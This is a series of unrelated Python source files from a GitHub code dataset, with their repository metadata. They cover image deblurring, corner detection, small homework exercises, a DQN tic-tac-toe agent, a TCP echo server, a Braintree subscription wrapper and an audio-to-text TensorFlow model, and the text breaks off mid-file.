in range(motion_dis):\n x_offset = round(sin_val * i)\n y_offset = round(cos_val * i)\n PSF[int(x_center - x_offset), int(y_center + y_offset)] = 1\n\n return np.fft.fft2(PSF / PSF.sum())\n\n# 维纳滤波\ndef wiener(f, PSF,K=0.1): # 维纳滤波,K=0.01\n input_fft = np.fft.fft2(f)\n PSF_fft_1 = np.conj(PSF) / (np.abs(PSF) ** 2 + K)\n result = np.fft.ifftshift(np.fft.ifft2(input_fft * PSF_fft_1))\n return result.real\n\n\ndef show(f, s, a, b, c):\n plt.subplot(a, b, c)\n plt.imshow(f, \"gray\")\n plt.axis('on')\n plt.title(s)\n\n\ndef main():\n img1 = cv2.imread('blur.png', 0)\n img = img1[100:551, 500:951]\n # img = cv.medianBlur(img, 2)\n PSF = get_motion_dsf(img.shape, 4, -0.1)\n plt.figure()\n show(img, \"f\", 1, 2, 1)\n show(wiener(img, PSF), \"restoreImage\", 1, 2, 2)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"PengQ0203/Torch","sub_path":"CV/deblur/weina.py","file_name":"weina.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4332260107","text":"from scipy import signal as sig\nfrom scipy import ndimage as ndi\nimport numpy as np\nfrom skimage.io import imread\nfrom skimage.color import rgb2gray\nfrom skimage.feature import corner_peaks\nimport matplotlib.pylab as plt\nfrom math import floor\n\nimg = imread('./start.jpeg')\nimggray = rgb2gray(img)\n\ndef gradient_x(imggray):\n ##Sobel operator kernels.\n kernel_x = np.array([[-1, 0, 1],[-2, 0, 2],[-1, 0, 1]])\n return sig.convolve2d(imggray, kernel_x, mode='same')\ndef gradient_y(imggray):\n kernel_y = np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]])\n return sig.convolve2d(imggray, kernel_y, mode='same')\n\nI_x = gradient_x(imggray)\nI_y = gradient_y(imggray)\n\nIxx = ndi.gaussian_filter(I_x**2, sigma=1)\nIxy = ndi.gaussian_filter(I_y*I_x, sigma=1)\nIyy = ndi.gaussian_filter(I_y**2, sigma=1)\n\nk = 0.05\n\n# determinant\ndetA = Ixx * Iyy - Ixy ** 2\n# trace\ntraceA = Ixx + Iyy\n \nharris_response = detA - k * traceA ** 2\n\nwindow_size = 3\n\noffset = floor(window_size/2)\nheight , width =Ixx.shape\n\nfor y in range(offset, height-offset):\n for x in range(offset, width-offset):\n Sxx = np.sum(Ixx[y-offset:y+1+offset, x-offset:x+1+offset])\n Syy = np.sum(Iyy[y-offset:y+1+offset, x-offset:x+1+offset])\n Sxy = np.sum(Ixy[y-offset:y+1+offset, x-offset:x+1+offset])\n\n#Find determinant and trace, use to get corner response\ndet = (Sxx * Syy) - (Sxy**2)\ntrace = Sxx + Syy\nr = det - k*(trace**2)\n\nimg_copy_for_corners = np.copy(img)\nimg_copy_for_edges = np.copy(img)\n\nfor rowindex, response in enumerate(harris_response):\n for colindex, r in enumerate(response):\n if r > 0:\n # this is a corner\n img_copy_for_corners[rowindex, colindex] = [255,0,0]\n elif r < 0:\n # this is an edge\n img_copy_for_edges[rowindex, colindex] = [0,255,0]\n\ncorners = corner_peaks(harris_response)\nfig, ax = plt.subplots()\nax.imshow(img, interpolation='nearest', cmap=plt.cm.gray)\nax.plot(corners[:, 1], corners[:, 0], '.r', markersize=3)\nplt.show()\n","repo_name":"Typelias/AR_Assignments","sub_path":"Assignment3/OLD2.py","file_name":"OLD2.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70722339076","text":"# 3.2[18]: Требуется найти в списке целых чисел самый близкий по величине элемент к заданному числу X.\n# Пользователь вводит это число с клавиатуры, список можно считать заданным. Введенное число не обязательно содержится в списке.\n# Если в списке несколько чисел \"равноблизких\" к заданному числу X, то выводим первое встретившееся.\n# Примеры/Тесты:\n# Input: [10, 5, 7, 3, 3, 2, 5, 7, 3, 8], X = 0\n# Output: 2\n# Input: [10, 5, 7, 3, 3, 2, 5, 7, 3, 8], X = 9\n# Output: 10\n\nn = [10, 5, 7, 3, 3, 2, 5, 7, 3, 8]\nx = int(input('Введите число X: '))\nnearest_value = 0\ndef nearest_value(n, x):\n found = n[0] # найденное значение (первоначально первое)\n for item in n:\n if abs(item - x) < abs(found - x):\n found = item\n return found\n\nprint(nearest_value(n, x))","repo_name":"AnastasiaGolo/Hometask","sub_path":"hometask3_2.py","file_name":"hometask3_2.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28230443247","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 22 10:39:47 2021\n\n@author: magnudry\n\"\"\"\n\nimport xarray as xr\nimport numpy as np\n\nzfile = \"/uio/lagringshotell/geofag/students/metos/magnudry/Master/Fra_PEI/creg12.l75/CREG12.L75-REF08_mesh_zgr.nc\"\nzgrid = xr.open_dataset(zfile)\ngrdthn = zgrid.isel(t = 0, x = slice(0,1580,10), y = slice(0,1801,10))\n\nufile = \"/uio/lagringshotell/geofag/students/metos/magnudry/Master/U_comp/CREG12.L75-REF08_y2000m01d05.5d_gridU.nc\"\nudata = xr.open_dataset(ufile)\nudatathn = udata.isel(time_counter = 0, x = slice(0,1580,10), y = slice(0,1801,10))\n#print(grdthn)\n#print(udatathn)\n\nudatathn = udatathn.assign(u_bot = udatathn[\"vozocrtx\"].isel(depthu = grdthn[\"mbathy\"]-1))\n\nprint(udatathn[\"u_bot\"].data[105,105] == 0)","repo_name":"magnudry/Master-deg","sub_path":"Test_funcs/karen_problem.py","file_name":"karen_problem.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"42898609812","text":"from setuptools import setup, find_packages\n\nSRC_DIR = 'src'\n\n\ndef get_version():\n import sys\n\n sys.path[:0] = [SRC_DIR]\n return __import__('dancing_bear').__version__\n\n\nsetup(\n name='dancing-bear',\n version=get_version(),\n description='Dancing Bear',\n author='mogproject',\n author_email='mogproj@gmail.com',\n license='Apache 2.0 License',\n url='https://github.com/mogproject/dancing-bear',\n install_requires=[\n 'six',\n 'python-dateutil',\n 'pytz',\n 'tzlocal',\n 'argparse',\n 'pyserial',\n 'mog-commons >= 0.1.3',\n ],\n tests_require=[\n 'unittest2',\n ],\n package_dir={'': SRC_DIR},\n packages=find_packages(SRC_DIR),\n include_package_data=True,\n test_suite='tests',\n entry_points=\"\"\"\n [console_scripts]\n dancing-bear = dancing_bear.dancing_bear:main\n \"\"\",\n)\n","repo_name":"mogproject/dancing-bear","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30267679907","text":"import pandas as pd\n\nfrom parameters.data_path import DIR_EDF, DIR_INPUT, DIR_PROCESSED\nfrom utils.data_conversion import create_annoation_df\nfrom utils.kfold import create_folds\n\n\ndef main():\n train_record_df = pd.read_csv(f\"{DIR_INPUT}/train_records.csv\")\n train_record_df[\"hypnogram\"] = DIR_EDF + \"/\" + train_record_df[\"hypnogram\"]\n train_record_df[\"psg\"] = DIR_EDF + \"/\" + train_record_df[\"psg\"]\n\n test_record_df = pd.read_csv(f\"{DIR_INPUT}/test_records.csv\")\n test_record_df[\"psg\"] = DIR_EDF + \"/\" + test_record_df[\"psg\"]\n\n train_df = create_annoation_df(train_record_df, is_test=False)\n train_df.to_csv(f\"{DIR_PROCESSED}/train_df0.csv\", index=False)\n # (161610, 4)\n test_df = create_annoation_df(test_record_df, is_test=True)\n test_df.to_csv(f\"{DIR_PROCESSED}/test_df0.csv\", index=False)\n # print(test_df.shape) # (52296, 4)\n\n train_df = pd.read_csv(f\"{DIR_PROCESSED}/train_df0.csv\")\n\n folds = create_folds(train_df)\n folds.to_csv(f\"{DIR_PROCESSED}/train_df_fold.csv\", index=False)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"masachika-kamada/sleep-stage-detection","sub_path":"create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30501322545","text":"# for val in \"codingDojo!\":\r\n# if val == \"o\":\r\n# continue\r\n# print (val)\r\n\r\n# # for val in \"string\":\r\n# # if val == \"i\":\r\n# # break\r\n# # print(val)\r\n# list = [3,5,1,2]\r\n# for i in list:\r\n# print(i)\r\n\r\n# list = [3,5,1,2]\r\n# for i in range(list):\r\n# print(i)\r\n\r\n\r\n# list = [3,5,1,2,5,6,7,6,4,3,2,3,342,23,4,23,4,23,42,7,4,5,5,4,56,45]\r\n# for i in range(len(list)):\r\n# print(i)\r\n\r\n\r\n# def biggie(arr)\r\n\r\nclass Case:\r\n def __init__(self,color,length,width,material):\r\n self.color = color\r\n self.length = length\r\n self.width = width\r\n self.material = material\r\n def drop(self):\r\n print(f\"hi my color is {self.color} and i am made out of {self.material}\")\r\n return self\r\n\r\n\r\n\r\ncase1 = Case(\"red\",\" \", \" \", \"nylon\")\r\ncase1.drop().drop().drop().drop().drop()","repo_name":"Anshuman2328/pyfunda","sub_path":"exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38445145408","text":"from nasa_fevo.Cache import Cache\nfrom nasa_fevo.RoverImagesRetriever import RoverImagesRetriever, \\\n DEFAULT_ROVER, DEFAULT_DAYS_TO_GET, DEFAULT_IMAGES_PER_DAY\n\nfrom urllib.parse import urlencode\nfrom datetime import date, timedelta, datetime\n# from nasa_fevo.HttpGetter import HttpGetter\nfrom nasa_fevo.HttpGetterWithCache import HttpGetterWithCache\n\n\nclass RoverImagesRetrieverWithCache(RoverImagesRetriever):\n def __init__(self, cache: Cache):\n http_getter_with_cache = HttpGetterWithCache(cache)\n super(RoverImagesRetrieverWithCache, self).__init__(http_getter_with_cache)\n self._cache: Cache = cache\n\n async def get_rover_images(self,\n rover: str = DEFAULT_ROVER,\n days_to_get: int = DEFAULT_DAYS_TO_GET,\n max_photos_per_day: int = DEFAULT_IMAGES_PER_DAY) -> str:\n\n today, url = self._make_pseudo_url_for_caching(days_to_get, max_photos_per_day, rover)\n\n resp = self._cache.get(url)\n if resp is not None:\n return resp\n else:\n resp = await super().get_rover_images(rover, days_to_get, max_photos_per_day)\n expires_next_day = datetime.combine(today+timedelta(days=1), datetime.min.time())\n self._cache.put(url, resp, expires_next_day)\n return resp\n\n def _make_pseudo_url_for_caching(self, days_to_get, max_photos_per_day, rover):\n today = date.today()\n params = {\n \"today\": today, \"rover\": rover, \"days_to_get\": days_to_get, \"max_photos_per_day\": max_photos_per_day\n }\n params = urlencode(params)\n url = f\"nasa_fevo://rover-images?{params}\"\n return today, url\n\n","repo_name":"lradomski10m/nasa-fevo","sub_path":"nasa_fevo/RoverImagesRetrieverWithCache.py","file_name":"RoverImagesRetrieverWithCache.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30827928829","text":"import torch\r\nimport random\r\nimport numpy as np\r\nfrom net import Net, Trainer\r\nfrom collections import deque\r\nimport torch.nn.functional as F\r\n\r\n\r\nMAX_MEMORY = 100_000\r\nBATCH_SIZE = 60\r\nLR = 0.01\r\nX = 1\r\nO = 2\r\n\r\n\r\nclass Q_Agent:\r\n def __init__(self, side):\r\n self.n_games = 0\r\n self.epsilon = 0.9999\r\n self.epsilon_decrease = 0.9997\r\n self.gamma = 0.99\r\n self.memory = deque(maxlen=MAX_MEMORY)\r\n self.q_net = Net()\r\n self.target_net = Net()\r\n self.trainer = Trainer(self.q_net, self.target_net, lr=LR, gamma=self.gamma)\r\n self.pieces = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])\r\n self.side = side\r\n self.action_log = []\r\n self.board_position_log = []\r\n\r\n def get_other(self):\r\n if self.side == X:\r\n return O\r\n elif self.side == O:\r\n return X\r\n\r\n def get_state(self, game):\r\n state = np.array([self.pieces.astype(int),\r\n (game.get_side(self.get_other())).astype(int),\r\n (game.get_empty()).astype(int)])\r\n state = state.reshape(3, 3, 3)\r\n state = np.transpose(state, [0, 1, 2])\r\n self.board_position_log.append(state.copy())\r\n return state\r\n\r\n def remember(self, reward):\r\n length = len(self.action_log)\r\n for i in range(length - 1):\r\n self.memory.append((self.board_position_log[i], self.action_log[i], 0, self.board_position_log[i + 1], False))\r\n\r\n self.memory.append((self.board_position_log[length - 1], self.action_log[length - 1], reward, np.array(([[0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0]], [[1, 1, 1], [1, 1, 1], [1, 1, 1]])), True))\r\n self.board_position_log = []\r\n self.action_log = []\r\n\r\n def train_long_memory(self):\r\n batch = random.sample(self.memory, BATCH_SIZE)\r\n states, actions, rewards, next_states, dones = zip(*batch)\r\n self.epsilon *= self.epsilon_decrease\r\n self.trainer.train_step(states, actions, rewards, next_states, dones)\r\n\r\n def train_short_memory(self, state, action, reward, next_state, done):\r\n self.trainer.train_step(state, action, reward, next_state, done)\r\n\r\n def get_action(self, state):\r\n self.epsilon = 0\r\n if self.n_games > 500:\r\n self.epsilon = 0.9999\r\n final_move = [0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n action = 0\r\n if random.random() > self.epsilon:\r\n r = random.randint(0, 2)\r\n c = random.randint(0, 2)\r\n while state[2, r, c] == 0:\r\n r = random.randint(0, 2)\r\n c = random.randint(0, 2)\r\n\r\n final_move[(3 * r) + c] = 1\r\n action = (3 * r) + c\r\n else:\r\n state0 = torch.tensor(state, dtype=torch.float)\r\n actions = self.q_net.forward(state0)\r\n actions = F.softmax(actions)\r\n\r\n while state[action] != 0:\r\n i = 0\r\n idx = None\r\n for e in actions:\r\n if e == torch.max(actions):\r\n idx = i\r\n i += 1\r\n\r\n actions[idx] = -1\r\n action = torch.argmax(actions).item()\r\n final_move[action] = 1\r\n\r\n self.action_log.append(action)\r\n return final_move\r\n","repo_name":"980073600/dqn-tic-tac-toe","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36060035384","text":"# -- coding: utf-8 --\n# @Time : 2022/7/27 17:03\n# @Author : Liu Hui\n# @Email : 1073811240@qq.com\n# @File : 09-并发TCP服务器.py\n# @Software: PyCharm\n\nimport socket\nimport threading\n\nclass HandleData(threading.Thread):\n def __init__(self, client_socket):\n super(HandleData, self).__init__()\n self.client_socket = client_socket\n\n def run(self):\n # 5. 接收/发送数据\n while True:\n recv_content = self.client_socket.recv(1024)\n if len(recv_content) != 0:\n print(recv_content)\n self.client_socket.send(recv_content)\n else:\n self.client_socket.close()\n break\n\n\nclass TCPServer(threading.Thread):\n def __init__(self, port):\n super(TCPServer, self).__init__()\n # 1. 创建套接字\n self.server_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # 2. 绑定本地信息, 设置端口号\n self.server_s.bind((\"\", port))\n\n # 3. 将套接字由默认的主动连接模式改为被动模式(监听模块)\n self.server_s.listen(128)\n\n def run(self):\n\n while True:\n # 4. 等待客户端进行连接\n new_s, client_info = self.server_s.accept() # 服务端接收 多个客户端进行连接\n print(client_info) # ('192.168.133.1', 63889)\n\n # 创建一个新的线程,专门为刚刚连接的客户端服务\n handle_data_thread = HandleData(new_s)\n handle_data_thread.start()\n\n def __del__(self):\n # 6. 关闭套接字\n self.server_s.close()\n\n\ntcp_server = TCPServer(7890)\ntcp_server.start()\n","repo_name":"liu1073811240/Multithreading","sub_path":"01-多线程/09-并发TCP服务器.py","file_name":"09-并发TCP服务器.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18324214408","text":"#!/usr/bin/env python\n\nimport cv2\nimport sys\n\n\ndef main():\n cascadePath = sys.argv[1]\n faceCascade = cv2.CascadeClassifier(cascadePath)\n\n webcam = cv2.VideoCapture(0)\n\n while True:\n ret, frame = webcam.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n\n faces = faceCascade.detectMultiScale(\n gray,\n 1.1,\n 5,\n minSize=(30, 30)\n )\n\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n cv2.imshow(\"Webcam\", frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n webcam.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JasonHarrer/PythonFun_FacialRec","sub_path":"recognize_webcam.py","file_name":"recognize_webcam.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23585305641","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 15 09:53:08 2017\n\n@author: marshi\n\"\"\"\n\nimport numpy as np\n\ndef max_syrup(r,h,k,n):\n r = np.array(r)\n h = np.array(h)\n \n sort = r.argsort()[::-1]\n \n r,h = r[sort],h[sort]\n space = np.array([2*np.pi*r_*h_ for r_,h_ in zip(r,h)])\n candidate = []\n for start in range(k-n+1):\n up_space = np.pi*r[start]*r[start]\n if n > 1:\n side_space = space[start]+sum(sorted(space[start+1:])[-(n-1):])\n else:\n side_space = space[start]\n candidate.append(up_space+side_space)\n \n return max(candidate)\n\n\nif 0:\n #t = int(input())\n \n k,n = 1000,1000\n \n r = np.random.randint(100, size=1000)\n h = np.random.randint(100, size=1000)\n print(max_syrup(r,h,k,n))\nelse:\n t = int(input())\n for i in range(t):\n k,n = map(int, input().split(' '))\n r,h = [],[]\n for _ in range(k):\n r_,h_ = map(int, input().split(' '))\n r.append(r_)\n h.append(h_)\n print(\"Case #%d: %.9f\" % (i+1, max_syrup(r,h,k,n)))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/146.py","file_name":"146.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16621971649","text":"import numpy as np\r\nimport math\r\n\r\nmap_path = \"maps.npy\"\r\nmap_global_scale = 0.9\r\nmaps = np.load(map_path, allow_pickle=True)\r\nmap_amount = maps.shape[0]\r\n\r\ndef get_min_max(map):\r\n #Get x,y-coordinates\r\n map_coords = map.reshape((-1, 2))\r\n\r\n #Get minimum x,y coordinates\r\n return np.min(map_coords, axis=0), np.max(map_coords, axis=0)\r\n\r\n\r\ndef get_map(id, direction, width, height):\r\n #Retrieve map from cache\r\n map = maps[id]\r\n map = np.array([map[0], map[1]])[:, ::-1 if direction else 1]\r\n\r\n #Get smallest dimension of playground\r\n if width < height:\r\n map_coords_index = 0\r\n map_scaler = width\r\n else:\r\n map_coords_index = 1\r\n map_scaler = height\r\n\r\n\r\n #Get map limits\r\n (map_min, map_max) = get_min_max(map)\r\n min = map_min[map_coords_index]\r\n max = map_max[map_coords_index]\r\n \r\n #Normalize map\r\n nrm_map = (map - min) / (max - min)\r\n #Scale map\r\n scaled_map = nrm_map * map_scaler * map_global_scale\r\n \r\n #Get scaled map limits\r\n (map_min, map_max) = get_min_max(scaled_map)\r\n \r\n #Calculate centering offset\r\n map_offset = np.array([width, height]) / 2\r\n map_offset += -map_min - (map_max - map_min) / 2\r\n \r\n #Offset map\r\n scaled_map += map_offset.reshape(1, 1, 2)\r\n\r\n #Return map\r\n return scaled_map\r\n","repo_name":"sarphiv/dtu-intro-ai-exam-project","sub_path":"environment/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24114670683","text":"import logging\nfrom braintree import Subscription\nfrom braintree.exceptions import NotFoundError\n\nfrom almanac.exc.exceptions import IntegrationException\n\n\nclass BraintreeSubscription(object):\n \"\"\"\n Handles third-party integrations concerning subscripts for the braintree\n payment platform.\n \"\"\"\n\n def start_subscription(self, unique_id, payment_method_token, plan_id):\n \"\"\"\n Handles starting a subscription for the provided plan.\n\n :param str unique_id: A unique UUID associated with the subbscription.\n :param str payment_method_token: The payment method token which is\n created during customer creation.\n :param str plan_id: The plan we want the user to subscribe under\n :return: The result from starting the subscription\n \"\"\"\n result = Subscription.create({\n 'id': unique_id,\n 'payment_method_token': payment_method_token,\n 'plan_id': plan_id,\n })\n\n if not result.is_success:\n logging.error(\n 'Failed to start subscription for payment method {0} '\n 'with a plan ID of {1}',\n payment_method_token,\n plan_id,\n )\n raise IntegrationException('Failed to start subscription.')\n\n return result\n\n def stop_subscription(self, subscription_id):\n \"\"\"\n Handles cancelling a subscription.\n\n :param str subscription_id: The unique subscription ID created from.\n :return: The result of stopping the subscription.\n \"\"\"\n try:\n result = Subscription.cancel(subscription_id)\n except NotFoundError as e:\n logging.error('Subscription ID {0} not found.')\n raise IntegrationException(\n 'Failed to cancel subscription. '\n 'Please contact ian@ianleeclark.com'\n )\n\n if not result.is_success:\n logging.error(\n 'Failed to cancel subscription by ID'\n )\n raise IntegrationException(\n 'Failed to cancel subscription. '\n 'Please contact ian@ianleeclark.com'\n )\n\n return result\n","repo_name":"Ianleeclark/providebooking-backend","sub_path":"almanac/integrations/braintree/subscriptions.py","file_name":"subscriptions.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73149259395","text":"#!/usr/bin/env python3\n\nimport tensorflow as tf\nimport numpy as np\nimport logging\nimport math\nimport pickle as pkl\nLOGGER = logging.getLogger(__name__)\n\n\nclass audio2text_ICP(object):\n AUDIO_HOLDER = 'audio_holder'\n TEXT_HOLDER = 'text_holder'\n LR_HOLDER = 'lr_holder'\n\n def __init__(\n self,\n audio_dim: int,\n text_dim: int,\n batch_size: int,\n penalty_lambda: float,\n logger=LOGGER,\n ):\n self.audio_dim = audio_dim\n self.text_dim = text_dim\n self.graph = tf.Graph()\n self.batch_size = batch_size\n self.penalty_lambda = penalty_lambda\n self.logger = logger\n # assert audio_k_way == text_n_vocab\n assert audio_dim == text_dim\n self.dim = audio_dim\n with self.graph.as_default():\n self._build_graph()\n self.config = tf.ConfigProto(log_device_placement=False)\n self.config.gpu_options.allow_growth = True\n self.sess = tf.Session(graph=self.graph, config=self.config)\n self.sess.run(tf.variables_initializer(\n var_list=self.graph.get_collection('variables')))\n self.saver = tf.train.Saver(\n var_list=self.graph.get_collection('variables'),\n max_to_keep=None)\n\n def _build_input_graph(self):\n self.t2a_text_holder = tf.placeholder(\n tf.float32,\n [None, self.dim],\n name='t2a_'+self.TEXT_HOLDER,\n )\n self.t2a_audio_holder = tf.placeholder(\n tf.float32,\n [None, self.dim],\n name='t2a_'+self.AUDIO_HOLDER,\n )\n self.a2t_audio_holder = tf.placeholder(\n tf.float32,\n [None, self.dim],\n name='a2t_'+self.AUDIO_HOLDER,\n )\n self.a2t_text_holder = tf.placeholder(\n tf.float32,\n [None, self.dim],\n name='a2t_'+self.TEXT_HOLDER,\n )\n self.lr = tf.placeholder(\n tf.float32,\n [],\n name=self.LR_HOLDER,\n )\n return\n\n def _build_Mb_graph(self):\n self.M_text2audio = tf.Variable(tf.eye(self.dim), name='t2a_matrix')\n self.b_text2audio = tf.Variable(\n tf.random_normal([self.dim]),\n name='t2a_bias',\n )\n self.M_audio2text = tf.Variable(tf.eye(self.dim), name='a2t_matrix')\n self.b_audio2text = tf.Variable(\n tf.random_normal([self.dim]),\n name='a2t_bias',\n )\n return\n\n def _build_Loss(self, y_hat, xy_hat, x_hat, yx_hat):\n t2a_loss = tf.losses.mean_squared_error(\n labels=self.t2a_audio_holder,\n predictions=y_hat,\n )\n tf.identity(t2a_loss, name='t2a_loss')\n\n a2t_loss = tf.losses.mean_squared_error(\n labels=self.a2t_text_holder,\n predictions=x_hat,\n )\n tf.identity(a2t_loss, name='a2t_loss')\n t2a2t_loss = tf.losses.mean_squared_error(\n labels=self.t2a_text_holder,\n predictions=xy_hat,\n weights=self.penalty_lambda,\n )\n tf.identity(t2a2t_loss, name='t2a2t_loss')\n a2t2a_loss = tf.losses.mean_squared_error(\n labels=self.a2t_audio_holder,\n predictions=yx_hat,\n weights=self.penalty_lambda,\n )\n tf.identity(a2t2a_loss, name='a2t2a_loss')\n all_loss = tf.identity(\n t2a_loss + a2t_loss + t2a2t_loss + a2t2a_loss,\n name='all_loss')\n return all_loss\n\n def _build_graph(self):\n # None stands for the batch size\n self._build_input_graph()\n self._build_Mb_graph()\n y_hat, xy_hat = self.t2a_trans(\n self.t2a_text_holder, self.t2a_audio_holder)\n x_hat, yx_hat = self.a2t_trans(\n self.a2t_audio_holder, self.a2t_text_holder)\n \n self.f1score = self.getFscore(1, self.a2t_text_holder, x_hat, 'f1score')\n self.f10score = self.getFscore(10, self.a2t_text_holder, x_hat, 'f10score')\n \n all_loss = self._build_Loss(y_hat, xy_hat, x_hat, yx_hat)\n # self.train_op = tf.train.GradientDescentOptimizer(self.lr).minimize(\n self.train_op = tf.train.AdamOptimizer(self.lr).minimize(\n all_loss,\n var_list=[self.M_text2audio, self.M_audio2text, self.b_audio2text,\n self.b_text2audio],\n name='train_op')\n return\n\n def findNN(self, y, y_hat):\n '''\n Args:\n y: the source to be compared\n y_hat: the target comparing\n Returns:\n inds: the indices of the result y hat\n '''\n # using the x_hat to find the nearest neighbour\n\n\n return\n\n def findKNN(self, y, y_hat, k):\n '''\n Args:\n y: the source to be compared\n y_hat: the target comparing\n Returns:\n y_ave: the average over the kNN\n '''\n return\n # Wx @ X + by = Y_hat, Wy @ y_hat + bx = X_hat_hat\n\n\n def t2a_trans(self, X, Y):\n '''\n Args:\n x should be the text embedding\n y should be the audio embedding\n '''\n y_hat_tmp = tf.matmul(\n self.M_text2audio,\n tf.transpose(X))\n y_hat_tmp = tf.transpose(y_hat_tmp)\n y_hat_tmp = tf.add(y_hat_tmp, self.b_text2audio)\n # y_hat_tmp = tf.nn.sigmoid(y_hat_tmp)\n y_hat = tf.identity(y_hat_tmp, name='audio_hat')\n\n xy_hat_tmp = tf.matmul(\n self.M_audio2text,\n tf.transpose(y_hat_tmp))\n xy_hat_tmp = tf.transpose(xy_hat_tmp)\n xy_hat_tmp = tf.add(xy_hat_tmp, self.b_audio2text)\n # xy_hat_tmp = tf.nn.sigmoid(xy_hat_tmp)\n xy_hat = tf.identity(xy_hat_tmp, name='text_hat_hat')\n\n return y_hat, xy_hat\n\n # Wy @ Y = X_hat, Wx @ X_hat = Y_hat_hat\n def a2t_trans(self, Y, X):\n '''\n Args:\n x should be the text embedding\n y should be the audio embedding\n '''\n x_hat_tmp = tf.matmul(\n self.M_audio2text,\n tf.transpose(Y))\n x_hat_tmp = tf.transpose(x_hat_tmp)\n x_hat_tmp = x_hat_tmp + self.b_audio2text\n # x_hat_tmp = tf.nn.sigmoid(x_hat_tmp)\n x_hat = tf.identity(x_hat_tmp, name='text_hat')\n\n yx_hat_tmp = tf.matmul(\n self.M_text2audio,\n tf.transpose(x_hat_tmp))\n yx_hat_tmp = tf.transpose(yx_hat_tmp)\n yx_hat_tmp = yx_hat_tmp + self.b_text2audio\n # yx_hat_tmp = tf.nn.sigmoid(yx_hat_tmp)\n yx_hat = tf.identity(yx_hat_tmp, name='audio_hat_hat')\n return x_hat, yx_hat\n\n def gen_batch(self):\n order_t2a = np.arange(self.text_embeds.shape[0])\n np.random.shuffle(order_t2a)\n order_a2t = np.arange(self.audio_embeds.shape[0])\n np.random.shuffle(order_a2t)\n self.t2a_text = self.text_embeds[order_t2a]\n self.t2a_audio = self.audio_embeds[order_t2a]\n self.a2t_text = self.text_embeds[order_a2t]\n self.a2t_audio = self.audio_embeds[order_a2t]\n cnt = 0\n num = math.ceil(float(self.text_embeds.shape[0]) / self.batch_size)\n while True:\n if cnt == num:\n self.new_epoch = True\n cnt = 0\n order_t2a = np.arange(self.text_embeds.shape[0])\n np.random.shuffle(order_t2a)\n order_a2t = np.arange(self.audio_embeds.shape[0])\n np.random.shuffle(order_a2t)\n self.t2a_text = self.text_embeds[order_t2a]\n self.t2a_audio = self.audio_embeds[order_t2a]\n self.a2t_text = self.text_embeds[order_a2t]\n self.a2t_audio = self.audio_embeds[order_a2t]\n start = cnt * self.batch_size\n end = start + self.batch_size\n ret = (\n self.t2a_text[start:end],\n self.t2a_audio[start:end],\n self.a2t_audio[start:end],\n self.a2t_text[start:end],\n )\n yield ret\n cnt += 1\n self.new_epoch = False\n\n def setTextAudio(self, t2a_text, t2a_audio, a2t_audio, a2t_text):\n self.text_embeds = t2a_text\n self.audio_embeds = a2t_audio\n self.t2a_audio = t2a_audio\n self.t2a_text = t2a_text\n self.a2t_audio = a2t_audio\n self.a2t_text = a2t_text\n return\n\n def getFscore(self, top_N, emb1, emb2, scope='Fscore'):\n # Trying to use tensorflow top k function to build\n with tf.variable_scope(scope):\n norm1 = tf.nn.l2_normalize(emb1, axis=1)\n shape = tf.shape(norm1)\n re_norm1 = tf.reshape(norm1, shape=(shape[0], 1, shape[1]))\n norm2 = tf.nn.l2_normalize(emb2, axis=1)\n # needs broadcast\n cos_sim = tf.reduce_sum(tf.multiply(re_norm1, 